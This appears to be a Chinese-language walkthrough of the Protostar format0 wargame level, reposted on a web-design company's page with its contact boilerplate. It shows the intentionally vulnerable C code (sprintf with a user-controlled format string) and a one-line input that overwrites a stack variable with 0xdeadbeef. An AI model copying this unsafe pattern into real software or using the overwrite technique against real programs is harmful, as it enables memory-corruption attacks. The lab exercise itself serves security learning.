Protostarformat0

About

This level introduces format strings, and how attacker supplied format strings can modify the execution flow of programs.

Hints:

This level should be done in less than 10 bytes of input.
"Exploiting format string vulnerabilities"

This level is at /opt/protostar/bin/format0

#include #include #include #include
void vuln(char *string)
{
volatile int target;
char buffer[64];

target = 0;

sprintf(buffer, string);

if(target == 0xdeadbeef) {
printf("you have hit the target correctly :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

格式化字符串热身题，只需要将target部分覆盖也\xdeadbeef即可。因为在定义时，target和buffer是连着的，因此在内存的位置也是一起的。故可得：

user@protostar:/opt/protostar/bin$ ./format0 $(python -c 'print "a"*64+"\xef\xbe\xad\xde"')
you have hit the target correctly :)

分享题目：Protostarformat0
文章来源：http://kswjz.com/article/jihsdd.html

扫二维码与项目经理沟通

我们在微信上24小时期待你的声音

解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流

Protostarformat0

About

扫二维码与项目经理沟通

其他资讯

行业动态

企业网站建设的重要性！

服务项目

网站建设

移动端/APP

微信/小程序

技术支持

其它服务

更多服务项目

联系吧在百度地图上找到我们

电话：13518219792

Protostarformat0

About

扫二维码与项目经理沟通

其他资讯

行业动态

企业网站建设的重要性！

服务项目

网站建设

移动端/APP

微信/小程序

技术支持

其它服务

更多服务项目

联系吧 在百度地图上找到我们

电话：13518219792

联系吧在百度地图上找到我们